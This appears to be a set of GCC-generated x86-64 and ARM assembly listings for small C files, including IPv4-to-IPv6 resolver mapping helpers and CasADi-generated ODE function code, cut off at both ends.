mov r0, r3 sub sp, fp, #8 @ sp needed pop {r4, fp, pc} .L11: .align 2 .L10: .word .LC6 .word 8888 .word .LC0 .word .LC1 .word .LC2 .word .LC3 .word .LC4 .word .LC5 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "55174.c" .intel_syntax noprefix .text .globl _map_v4v6_address .type _map_v4v6_address, @function _map_v4v6_address: .LFB6: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 48 mov QWORD PTR -40[rbp], rdi mov QWORD PTR -48[rbp], rsi mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov rax, QWORD PTR -48[rbp] mov QWORD PTR -24[rbp], rax mov rax, QWORD PTR -40[rbp] mov eax, DWORD PTR [rax] mov DWORD PTR -12[rbp], eax mov DWORD PTR -28[rbp], 0 jmp .L2 .L3: mov rax, QWORD PTR -24[rbp] lea rdx, 1[rax] mov QWORD PTR -24[rbp], rdx mov BYTE PTR [rax], 0 add DWORD PTR -28[rbp], 1 .L2: cmp DWORD PTR -28[rbp], 9 jle .L3 mov rax, QWORD PTR -24[rbp] lea rdx, 1[rax] mov QWORD PTR -24[rbp], rdx mov BYTE PTR [rax], -1 mov rax, QWORD PTR -24[rbp] lea rdx, 1[rax] mov QWORD PTR -24[rbp], rdx mov BYTE PTR [rax], -1 mov edx, DWORD PTR -12[rbp] mov rax, QWORD PTR -24[rbp] mov DWORD PTR [rax], edx nop mov rax, QWORD PTR -8[rbp] sub rax, QWORD PTR fs:40 je .L4 call __stack_chk_fail@PLT .L4: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE6: .size _map_v4v6_address, .-_map_v4v6_address .globl _map_v4v6_hostent .type _map_v4v6_hostent, @function _map_v4v6_hostent: .LFB7: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 48 mov QWORD PTR -24[rbp], rdi mov QWORD PTR -32[rbp], rsi mov QWORD PTR -40[rbp], rdx mov rax, QWORD PTR -24[rbp] mov eax, DWORD PTR 16[rax] cmp eax, 2 jne .L13 mov rax, QWORD PTR -24[rbp] mov eax, DWORD PTR 20[rax] cmp eax, 4 jne .L13 mov rax, QWORD PTR -24[rbp] mov DWORD PTR 16[rax], 10 mov rax, QWORD PTR -24[rbp] mov DWORD PTR 20[rax], 16 mov rax, QWORD PTR -24[rbp] mov rax, QWORD PTR 24[rax] mov QWORD PTR -8[rbp], rax jmp .L9 .L12: mov rax, QWORD PTR -32[rbp] mov rax, QWORD PTR [rax] and eax, 3 mov DWORD PTR -12[rbp], eax cmp DWORD PTR -12[rbp], 0 je .L10 mov edx, DWORD PTR -12[rbp] mov eax, 4 sub eax, edx mov DWORD PTR -12[rbp], eax .L10: mov rax, QWORD PTR -32[rbp] mov rcx, QWORD PTR [rax] mov rax, QWORD PTR -40[rbp] sub rax, rcx mov rdx, rax mov eax, DWORD PTR -12[rbp] add eax, 16 cdqe cmp rdx, rax jge .L11 mov rax, QWORD PTR -8[rbp] mov QWORD PTR [rax], 0 jmp .L5 .L11: mov rax, QWORD PTR -32[rbp] mov rdx, QWORD PTR [rax] mov eax, DWORD PTR -12[rbp] cdqe add rdx, rax mov rax, QWORD PTR -32[rbp] mov QWORD PTR [rax], rdx mov rax, QWORD PTR -32[rbp] mov rdx, QWORD PTR [rax] mov rax, QWORD PTR -8[rbp] mov rax, QWORD PTR [rax] mov rsi, rdx mov rdi, rax call _map_v4v6_address mov rax, QWORD PTR -32[rbp] mov rdx, QWORD PTR [rax] mov rax, QWORD PTR -8[rbp] mov QWORD PTR [rax], rdx mov rax, QWORD PTR -32[rbp] mov rax, QWORD PTR [rax] lea rdx, 16[rax] mov rax, QWORD PTR -32[rbp] mov QWORD PTR [rax], rdx add QWORD PTR -8[rbp], 8 .L9: mov rax, QWORD PTR -8[rbp] mov rax, QWORD PTR [rax] test rax, rax jne .L12 jmp .L5 .L13: nop .L5: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE7: .size _map_v4v6_hostent, .-_map_v4v6_hostent .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "55174.c" .text .section .rodata .align 2 .LC0: .word __stack_chk_guard .text .align 2 .global _map_v4v6_address .syntax unified .arm .fpu softvfp .type _map_v4v6_address, %function _map_v4v6_address: @ args = 0, pretend = 0, frame = 24 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #24 str r0, [fp, #-24] str r1, [fp, #-28] ldr r3, .L5 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 ldr r3, [fp, #-28] str r3, [fp, #-20] ldr r2, [fp, #-24] sub r3, fp, #12 mov r1, r2 mov r2, #4 mov r0, r3 bl memcpy mov r3, #0 str r3, [fp, #-16] b .L2 .L3: ldr r3, [fp, #-20] add r2, r3, #1 str r2, [fp, #-20] mov r2, #0 strb r2, [r3] ldr r3, [fp, #-16] add r3, r3, #1 str r3, [fp, #-16] .L2: ldr r3, [fp, #-16] cmp r3, #9 ble .L3 ldr r3, [fp, #-20] add r2, r3, #1 str r2, [fp, #-20] mvn r2, #0 strb r2, [r3] ldr r3, [fp, #-20] add r2, r3, #1 str r2, [fp, #-20] mvn r2, #0 strb r2, [r3] ldr r3, [fp, #-20] mov r0, r3 sub r3, fp, #12 mov r2, #4 mov r1, r3 bl memcpy nop ldr r3, .L5 ldr r2, [r3] ldr r3, [fp, #-8] eors r2, r3, r2 mov r3, #0 beq .L4 bl __stack_chk_fail .L4: sub sp, fp, #4 @ sp needed pop {fp, pc} .L6: .align 2 .L5: .word .LC0 .size _map_v4v6_address, .-_map_v4v6_address .align 2 .global _map_v4v6_hostent .syntax unified .arm .fpu softvfp .type _map_v4v6_hostent, %function _map_v4v6_hostent: @ args = 0, pretend = 0, frame = 24 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #24 str r0, [fp, #-16] str r1, [fp, #-20] str r2, [fp, #-24] ldr r3, [fp, #-16] ldr r3, [r3, #8] cmp r3, #2 bne .L15 ldr r3, [fp, #-16] ldr r3, [r3, #12] cmp r3, #4 bne .L15 ldr r3, [fp, #-16] mov r2, #10 str r2, [r3, #8] ldr r3, [fp, #-16] mov r2, #16 str r2, [r3, #12] ldr r3, [fp, #-16] ldr r3, [r3, #16] str r3, [fp, #-12] b .L11 .L14: ldr r3, [fp, #-20] ldr r3, [r3] and r3, r3, #3 str r3, [fp, #-8] ldr r3, [fp, #-8] cmp r3, #0 beq .L12 ldr r3, [fp, #-8] rsb r3, r3, #4 str r3, [fp, #-8] .L12: ldr r3, [fp, #-8] add r2, r3, #15 ldr r3, [fp, #-20] ldr r3, [r3] ldr r1, [fp, #-24] sub r3, r1, r3 cmp r2, r3 blt .L13 ldr r3, [fp, #-12] mov r2, #0 str r2, [r3] b .L7 .L13: ldr r3, [fp, #-20] ldr r2, [r3] ldr r3, [fp, #-8] add r2, r2, r3 ldr r3, [fp, #-20] str r2, [r3] ldr r3, [fp, #-12] ldr r2, [r3] ldr r3, [fp, #-20] ldr r3, [r3] mov r1, r3 mov r0, r2 bl _map_v4v6_address ldr r3, [fp, #-20] ldr r2, [r3] ldr r3, [fp, #-12] str r2, [r3] ldr r3, [fp, #-20] ldr r3, [r3] add r2, r3, #16 ldr r3, [fp, #-20] str r2, [r3] ldr r3, [fp, #-12] add r3, r3, #4 str r3, [fp, #-12] .L11: ldr r3, [fp, #-12] ldr r3, [r3] cmp r3, #0 bne .L14 b .L7 .L15: nop .L7: sub sp, fp, #4 @ sp needed pop {fp, pc} .size _map_v4v6_hostent, .-_map_v4v6_hostent .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "2738.c" .intel_syntax noprefix .text .section .rodata .align 32 .type impl_ode_fun_chain_nm2_s0, @object .size impl_ode_fun_chain_nm2_s0, 40 impl_ode_fun_chain_nm2_s0: .long 6 .long 1 .long 0 .long 6 .long 0 .long 1 .long 2 .long 3 .long 4 .long 5 .align 16 .type impl_ode_fun_chain_nm2_s1, @object .size impl_ode_fun_chain_nm2_s1, 28 impl_ode_fun_chain_nm2_s1: .long 3 .long 1 .long 0 .long 3 .long 0 .long 1 .long 2 .text .type impl_ode_fun_chain_nm2_f0, @function impl_ode_fun_chain_nm2_f0: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov QWORD PTR -24[rbp], rdi mov QWORD PTR -32[rbp], rsi mov QWORD PTR -40[rbp], rdx mov QWORD PTR -48[rbp], rcx mov QWORD PTR -56[rbp], r8 mov rax, QWORD PTR -24[rbp] add rax, 8 mov rax, QWORD PTR [rax] test rax, rax je .L2 mov rax, QWORD PTR -24[rbp] add rax, 8 mov rax, QWORD PTR [rax] movsd xmm0, QWORD PTR [rax] jmp .L3 .L2: pxor xmm0, xmm0 .L3: movsd QWORD PTR -16[rbp], xmm0 mov rax, QWORD PTR -24[rbp] mov rax, QWORD PTR [rax] test rax, rax je .L4 mov rax, QWORD PTR -24[rbp] mov rax, QWORD PTR [rax] movsd xmm0, QWORD PTR 24[rax] jmp .L5 .L4: pxor xmm0, xmm0 .L5: movsd QWORD PTR -8[rbp], xmm0 movsd xmm0, QWORD PTR -16[rbp] subsd xmm0, QWORD PTR -8[rbp] movsd QWORD PTR -16[rbp], xmm0 mov rax, QWORD PTR -32[rbp] mov rax, QWORD PTR [rax] test rax, rax je .L6 mov rax, QWORD PTR -32[rbp] mov rax, QWORD PTR [rax] movsd xmm0, QWORD PTR -16[rbp] movsd QWORD PTR [rax], xmm0 .L6: mov rax, QWORD PTR -24[rbp] add rax, 8 mov rax, QWORD PTR [rax] test rax, rax je .L7 mov rax, QWORD PTR -24[rbp] add rax, 8 mov rax, QWORD PTR [rax] movsd xmm0, QWORD PTR 8[rax] jmp .L8 .L7: pxor xmm0, xmm0 .L8: movsd QWORD PTR -16[rbp], xmm0 mov rax, QWORD PTR -24[rbp] mov rax, QWORD PTR [rax] test rax, rax je .L9 mov rax, QWORD PTR -24[rbp] mov rax, QWORD PTR [rax] movsd xmm0, QWORD PTR 32[rax] jmp .L10 .L9: pxor xmm0, xmm0 .L10: movsd QWORD PTR -8[rbp], xmm0 movsd xmm0, QWORD PTR -16[rbp] subsd xmm0, QWORD PTR -8[rbp] movsd QWORD PTR -16[rbp], xmm0 mov rax, QWORD PTR -32[rbp] mov rax, QWORD PTR [rax] test rax, rax je .L11 mov rax, QWORD PTR -32[rbp] mov rax, QWORD PTR [rax] add rax, 8 movsd xmm0, QWORD PTR -16[rbp] movsd QWORD PTR [rax], xmm0 .L11: mov rax, QWORD PTR -24[rbp] add rax, 8 mov rax, QWORD PTR [rax] test rax, rax je .L12 mov rax, QWORD PTR -24[rbp] add rax, 8 mov rax, QWORD PTR [rax] movsd xmm0, QWORD PTR 16[rax] jmp .L13 .L12: pxor xmm0, xmm0 .L13: movsd QWORD PTR -16[rbp], xmm0 mov rax, QWORD PTR -24[rbp] mov rax, QWORD PTR [rax] test rax, rax je .L14 mov rax, QWORD PTR -24[rbp] mov rax, QWORD PTR [rax] movsd xmm0, QWORD PTR 40[rax] jmp .L15 .L14: pxor xmm0, xmm0 .L15: movsd QWORD PTR -8[rbp], xmm0 movsd xmm0, QWORD PTR -16[rbp] subsd xmm0, QWORD PTR -8[rbp] movsd QWORD PTR -16[rbp], xmm0 mov rax, QWORD PTR -32[rbp] mov rax, QWORD PTR [rax] test rax, rax je .L16 mov rax, QWORD PTR -32[rbp] mov rax, QWORD PTR [rax] add rax, 16 movsd xmm0, QWORD PTR -16[rbp] movsd QWORD PTR [rax], xmm0 .L16: mov rax, QWORD PTR -24[rbp] add rax, 8 mov rax, QWORD PTR [rax] test rax, rax je .L17 mov rax, QWORD PTR -24[rbp] add rax, 8 mov rax, QWORD PTR [rax] movsd xmm0, QWORD PTR 24[rax] jmp .L18 .L17: pxor xmm0, xmm0 .L18: movsd QWORD PTR -16[rbp], xmm0 mov rax, QWORD PTR -24[rbp] add rax, 16 mov rax, QWORD PTR [rax] test rax, rax je .L19 mov rax, QWORD PTR -24[rbp] add rax, 16 mov rax, QWORD PTR [rax] movsd xmm0, QWORD PTR [rax] jmp .L20 .L19: pxor xmm0, xmm0 .L20: movsd QWORD PTR -8[rbp], xmm0 movsd xmm0, QWORD PTR -16[rbp] subsd xmm0, QWORD PTR -8[rbp] movsd QWORD PTR -16[rbp], xmm0 mov rax, QWORD PTR -32[rbp] mov rax, QWORD PTR [rax] test rax, rax je .L21 mov rax, QWORD PTR -32[rbp] mov rax, QWORD PTR [rax] add rax, 24 movsd xmm0, QWORD PTR -16[rbp] movsd QWORD PTR [rax], xmm0 .L21: mov rax, QWORD PTR -24[rbp] add rax, 8 mov rax, QWORD PTR [rax] test rax, rax je .L22 mov rax, QWORD PTR -24[rbp] add rax, 8 mov rax, QWORD PTR [rax] movsd xmm0, QWORD PTR 32[rax] jmp .L23 .L22: pxor xmm0, xmm0 .L23: movsd QWORD PTR -16[rbp], xmm0 mov rax, QWORD PTR -24[rbp] add rax, 16 mov rax, QWORD PTR [rax] test rax, rax je .L24 mov rax, QWORD PTR -24[rbp] add rax, 16 mov rax, QWORD PTR [rax] movsd xmm0, QWORD PTR 8[rax] jmp .L25 .L24: pxor xmm0, xmm0 .L25: movsd QWORD PTR -8[rbp], xmm0 movsd xmm0, QWORD PTR -16[rbp] subsd xmm0, QWORD PTR -8[rbp] movsd QWORD PTR -16[rbp], xmm0 mov rax, QWORD PTR -32[rbp] mov rax, QWORD PTR [rax] test rax, rax je .L26 mov rax, QWORD PTR -32[rbp] mov rax, QWORD PTR [rax] add rax, 32 movsd xmm0, QWORD PTR -16[rbp] movsd QWORD PTR [rax], xmm0 .L26: mov rax, QWORD PTR -24[rbp] add rax, 8 mov rax, QWORD PTR [rax] test rax, rax je .L27 mov rax, QWORD PTR -24[rbp] add rax, 8 mov rax, QWORD PTR [rax] movsd xmm0, QWORD PTR 40[rax] jmp .L28 .L27: pxor xmm0, xmm0 .L28: movsd QWORD PTR -16[rbp], xmm0 mov rax, QWORD PTR -24[rbp] add rax, 16 mov rax, QWORD PTR [rax] test rax, rax je .L29 mov rax, QWORD PTR -24[rbp] add rax, 16 mov rax, QWORD PTR [rax] movsd xmm0, QWORD PTR 16[rax] jmp .L30 .L29: pxor xmm0, xmm0 .L30: movsd QWORD PTR -8[rbp], xmm0 movsd xmm0, QWORD PTR -16[rbp] subsd xmm0, QWORD PTR -8[rbp] movsd QWORD PTR -16[rbp], xmm0 mov rax, QWORD PTR -32[rbp] mov rax, QWORD PTR [rax] test rax, rax je .L31 mov rax, QWORD PTR -32[rbp] mov rax, QWORD PTR [rax] add rax, 40 movsd xmm0, QWORD PTR -16[rbp] movsd QWORD PTR [rax], xmm0 .L31: mov eax, 0 pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size impl_ode_fun_chain_nm2_f0, .-impl_ode_fun_chain_nm2_f0 .globl casadi_impl_ode_fun_chain_nm2 .type casadi_impl_ode_fun_chain_nm2, @function casadi_impl_ode_fun_chain_nm2: .LFB1: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 40 mov QWORD PTR -8[rbp], rdi mov QWORD PTR -16[rbp], rsi mov QWORD PTR -24[rbp], rdx mov QWORD PTR -32[rbp], rcx mov QWORD PTR -40[rbp], r8 mov rdi, QWORD PTR -40[rbp] mov rcx, QWORD PTR -32[rbp] mov rdx, QWORD PTR -24[rbp] mov rsi, QWORD PTR -16[rbp] mov rax, QWORD PTR -8[rbp] mov r8, rdi mov rdi, rax call impl_ode_fun_chain_nm2_f0 leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE1: .size casadi_impl_ode_fun_chain_nm2, .-casadi_impl_ode_fun_chain_nm2 .globl casadi_impl_ode_fun_chain_nm2_incref .type casadi_impl_ode_fun_chain_nm2_incref, @function casadi_impl_ode_fun_chain_nm2_incref: .LFB2: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 nop pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE2: .size casadi_impl_ode_fun_chain_nm2_incref, .-casadi_impl_ode_fun_chain_nm2_incref .globl casadi_impl_ode_fun_chain_nm2_decref .type casadi_impl_ode_fun_chain_nm2_decref, @function casadi_impl_ode_fun_chain_nm2_decref: .LFB3: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 nop pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE3: .size casadi_impl_ode_fun_chain_nm2_decref, .-casadi_impl_ode_fun_chain_nm2_decref .globl casadi_impl_ode_fun_chain_nm2_n_in .type casadi_impl_ode_fun_chain_nm2_n_in, @function casadi_impl_ode_fun_chain_nm2_n_in: .LFB4: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov eax, 3 pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE4: .size casadi_impl_ode_fun_chain_nm2_n_in, .-casadi_impl_ode_fun_chain_nm2_n_in .globl casadi_impl_ode_fun_chain_nm2_n_out .type casadi_impl_ode_fun_chain_nm2_n_out, @function casadi_impl_ode_fun_chain_nm2_n_out: .LFB5: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov eax, 1 pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE5: .size casadi_impl_ode_fun_chain_nm2_n_out, .-casadi_impl_ode_fun_chain_nm2_n_out .section .rodata .LC1: .string "i0" .LC2: .string "i1" .LC3: .string "i2" .text .globl casadi_impl_ode_fun_chain_nm2_name_in .type casadi_impl_ode_fun_chain_nm2_name_in, @function casadi_impl_ode_fun_chain_nm2_name_in: .LFB6: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov DWORD PTR -4[rbp], edi cmp DWORD PTR -4[rbp], 2 je .L42 cmp DWORD PTR -4[rbp], 2 jg .L43 cmp DWORD PTR -4[rbp], 0 je .L44 cmp DWORD PTR -4[rbp], 1 je .L45 jmp .L43 .L44: lea rax, .LC1[rip] jmp .L46 .L45: lea rax, .LC2[rip] jmp .L46 .L42: lea rax, .LC3[rip] jmp .L46 .L43: mov eax, 0 .L46: pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE6: .size casadi_impl_ode_fun_chain_nm2_name_in, .-casadi_impl_ode_fun_chain_nm2_name_in .section .rodata .LC4: .string "o0" .text .globl casadi_impl_ode_fun_chain_nm2_name_out .type casadi_impl_ode_fun_chain_nm2_name_out, @function casadi_impl_ode_fun_chain_nm2_name_out: .LFB7: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov DWORD PTR -4[rbp], edi cmp DWORD PTR -4[rbp], 0 jne .L48 lea rax, .LC4[rip] jmp .L49 .L48: mov eax, 0 .L49: pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE7: .size casadi_impl_ode_fun_chain_nm2_name_out, .-casadi_impl_ode_fun_chain_nm2_name_out .globl casadi_impl_ode_fun_chain_nm2_sparsity_in .type casadi_impl_ode_fun_chain_nm2_sparsity_in, @function casadi_impl_ode_fun_chain_nm2_sparsity_in: .LFB8: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov DWORD PTR -4[rbp], edi cmp DWORD PTR -4[rbp], 2 je .L51 cmp DWORD PTR -4[rbp], 2 jg .L52 cmp DWORD PTR -4[rbp], 0 je .L53 cmp DWORD PTR -4[rbp], 1 je .L54 jmp .L52 .L53: lea rax, impl_ode_fun_chain_nm2_s0[rip] jmp .L55 .L54: lea rax, impl_ode_fun_chain_nm2_s0[rip] jmp .L55 .L51: lea rax, impl_ode_fun_chain_nm2_s1[rip] jmp .L55 .L52: mov eax, 0 .L55: pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE8: .size casadi_impl_ode_fun_chain_nm2_sparsity_in, .-casadi_impl_ode_fun_chain_nm2_sparsity_in .globl casadi_impl_ode_fun_chain_nm2_sparsity_out .type casadi_impl_ode_fun_chain_nm2_sparsity_out, @function casadi_impl_ode_fun_chain_nm2_sparsity_out: .LFB9: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov DWORD PTR -4[rbp], edi cmp DWORD PTR -4[rbp], 0 jne .L57 lea rax, impl_ode_fun_chain_nm2_s0[rip] jmp .L58 .L57: mov eax, 0 .L58: pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE9: .size casadi_impl_ode_fun_chain_nm2_sparsity_out, .-casadi_impl_ode_fun_chain_nm2_sparsity_out .globl casadi_impl_ode_fun_chain_nm2_work .type casadi_impl_ode_fun_chain_nm2_work, @function casadi_impl_ode_fun_chain_nm2_work: .LFB10: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov QWORD PTR -8[rbp], rdi mov QWORD PTR -16[rbp], rsi mov QWORD PTR -24[rbp], rdx mov QWORD PTR -32[rbp], rcx cmp QWORD PTR -8[rbp], 0 je .L60 mov rax, QWORD PTR -8[rbp] mov DWORD PTR [rax], 3 .L60: cmp QWORD PTR -16[rbp], 0 je .L61 mov rax, QWORD PTR -16[rbp] mov DWORD PTR [rax], 1 .L61: cmp QWORD PTR -24[rbp], 0 je .L62 mov rax, QWORD PTR -24[rbp] mov DWORD PTR [rax], 0 .L62: cmp QWORD PTR -32[rbp], 0 je .L63 mov rax, QWORD PTR -32[rbp] mov DWORD PTR [rax], 0 .L63: mov eax, 0 pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE10: .size casadi_impl_ode_fun_chain_nm2_work, .-casadi_impl_ode_fun_chain_nm2_work .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "2738.c" .text .section .rodata .align 2 .type impl_ode_fun_chain_nm2_s0, %object .size impl_ode_fun_chain_nm2_s0, 40 impl_ode_fun_chain_nm2_s0: .word 6 .word 1 .word 0 .word 6 .word 0 .word 1 .word 2 .word 3 .word 4 .word 5 .align 2 .type impl_ode_fun_chain_nm2_s1, %object .size impl_ode_fun_chain_nm2_s1, 28 impl_ode_fun_chain_nm2_s1: .word 3 .word 1 .word 0 .word 3 .word 0 .word 1 .word 2 .global __aeabi_dsub .text .align 2 .syntax unified .arm .fpu softvfp .type impl_ode_fun_chain_nm2_f0, %function impl_ode_fun_chain_nm2_f0: @ args = 4, pretend = 0, frame = 32 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #32 str r0, [fp, #-24] str r1, [fp, #-28] str r2, [fp, #-32] str r3, [fp, #-36] ldr r3, [fp, #-24] add r3, r3, #4 ldr r3, [r3] cmp r3, #0 beq .L2 ldr r3, [fp, #-24] add r3, r3, #4 ldr r3, [r3] ldmia r3, {r2-r3} b .L3 .L2: mov r2, #0 mov r3, #0 .L3: str r2, [fp, #-20] str r3, [fp, #-16] ldr r3, [fp, #-24] ldr r3, [r3] cmp r3, #0 beq .L4 ldr r3, [fp, #-24] ldr r3, [r3] add r3, r3, #24 ldmia r3, {r2-r3} b .L5 .L4: mov r2, #0 mov r3, #0 .L5: str r2, [fp, #-12] str r3, [fp, #-8] sub r3, fp, #12 ldmia r3, {r2-r3} sub r1, fp, #20 ldmia r1, {r0-r1} bl __aeabi_dsub mov r2, r0 mov r3, r1 str r2, [fp, #-20] str r3, [fp, #-16] ldr r3, [fp, #-28] ldr r3, [r3] cmp r3, #0 beq .L6 ldr r3, [fp, #-28] ldr r1, [r3] sub r3, fp, #20 ldmia r3, {r2-r3} stm r1, {r2-r3} .L6: ldr r3, [fp, #-24] add r3, r3, #4 ldr r3, [r3] cmp r3, #0 beq .L7 ldr r3, [fp, #-24] add r3, r3, #4 ldr r3, [r3] add r3, r3, #8 ldmia r3, {r2-r3} b .L8 .L7: mov r2, #0 mov r3, #0 .L8: str r2, [fp, #-20] str r3, [fp, #-16] ldr r3, [fp, #-24] ldr r3, [r3] cmp r3, #0 beq .L9 ldr r3, [fp, #-24] ldr r3, [r3] add r3, r3, #32 ldmia r3, {r2-r3} b .L10 .L9: mov r2, #0 mov r3, #0 .L10: str r2, [fp, #-12] str r3, [fp, #-8] sub r3, fp, #12 ldmia r3, {r2-r3} sub r1, fp, #20 ldmia r1, {r0-r1} bl __aeabi_dsub mov r2, r0 mov r3, r1 str r2, [fp, #-20] str r3, [fp, #-16] ldr r3, [fp, #-28] ldr r3, [r3] cmp r3, #0 beq .L11 ldr r3, [fp, #-28] ldr r3, [r3] add r1, r3, #8 sub r3, fp, #20 ldmia r3, {r2-r3} stm r1, {r2-r3} .L11: ldr r3, [fp, #-24] add r3, r3, #4 ldr r3, [r3] cmp r3, #0 beq .L12 ldr r3, [fp, #-24] add r3, r3, #4 ldr r3, [r3] add r3, r3, #16 ldmia r3, {r2-r3} b .L13 .L12: mov r2, #0 mov r3, #0 .L13: str r2, [fp, #-20] str r3, [fp, #-16] ldr r3, [fp, #-24] ldr r3, [r3] cmp r3, #0 beq .L14 ldr r3, [fp, #-24] ldr r3, [r3] add r3, r3, #40 ldmia r3, {r2-r3} b .L15 .L14: mov r2, #0 mov r3, #0 .L15: str r2, [fp, #-12] str r3, [fp, #-8] sub r3, fp, #12 ldmia r3, {r2-r3} sub r1, fp, #20 ldmia r1, {r0-r1} bl __aeabi_dsub mov r2, r0 mov r3, r1 str r2, [fp, #-20] str r3, [fp, #-16] ldr r3, [fp, #-28] ldr r3, [r3] cmp r3, #0 beq .L16 ldr r3, [fp, #-28] ldr r3, [r3] add r1, r3, #16 sub r3, fp, #20 ldmia r3, {r2-r3} stm r1, {r2-r3} .L16: ldr r3, [fp, #-24] add r3, r3, #4 ldr r3, [r3] cmp r3, #0 beq .L17 ldr r3, [fp, #-24] add r3, r3, #4 ldr r3, [r3] add r3, r3, #24 ldmia r3, {r2-r3} b .L18 .L17: mov r2, #0 mov r3, #0 .L18: str r2, [fp, #-20] str r3, [fp, #-16] ldr r3, [fp, #-24] add r3, r3, #8 ldr r3, [r3] cmp r3, #0 beq .L19 ldr r3, [fp, #-24] add r3, r3, #8 ldr r3, [r3] ldmia r3, {r2-r3} b .L20 .L19: mov r2, #0 mov r3, #0 .L20: str r2, [fp, #-12] str r3, [fp, #-8] sub r3, fp, #12 ldmia r3, {r2-r3} sub r1, fp, #20 ldmia r1, {r0-r1} bl __aeabi_dsub mov r2, r0 mov r3, r1 str r2, [fp, #-20] str r3, [fp, #-16] ldr r3, [fp, #-28] ldr r3, [r3] cmp r3, #0 beq .L21 ldr r3, [fp, #-28] ldr r3, [r3] add r1, r3, #24 sub r3, fp, #20 ldmia r3, {r2-r3} stm r1, {r2-r3} .L21: ldr r3, [fp, #-24] add r3, r3, #4 ldr r3, [r3] cmp r3, #0 beq .L22 ldr r3, [fp, #-24] add r3, r3, #4 ldr r3, [r3] add r3, r3, #32 ldmia r3, {r2-r3} b .L23 .L22: mov r2, #0 mov r3, #0 .L23: str r2, [fp, #-20] str r3, [fp, #-16] ldr r3, [fp, #-24] add r3, r3, #8 ldr r3, [r3] cmp r3, #0 beq .L24 ldr r3, [fp, #-24] add r3, r3, #8 ldr r3, [r3] add r3, r3, #8 ldmia r3, {r2-r3} b .L25 .L24: mov r2, #0 mov r3, #0 .L25: str r2, [fp, #-12] str r3, [fp, #-8] sub r3, fp, #12 ldmia r3, {r2-r3} sub r1, fp, #20 ldmia r1, {r0-r1} bl __aeabi_dsub mov r2, r0 mov r3, r1 str r2, [fp, #-20] str r3, [fp, #-16] ldr r3, [fp, #-28] ldr r3, [r3] cmp r3, #0 beq .L26 ldr r3, [fp, #-28] ldr r3, [r3] add r1, r3, #32 sub r3, fp, #20 ldmia r3, {r2-r3} stm 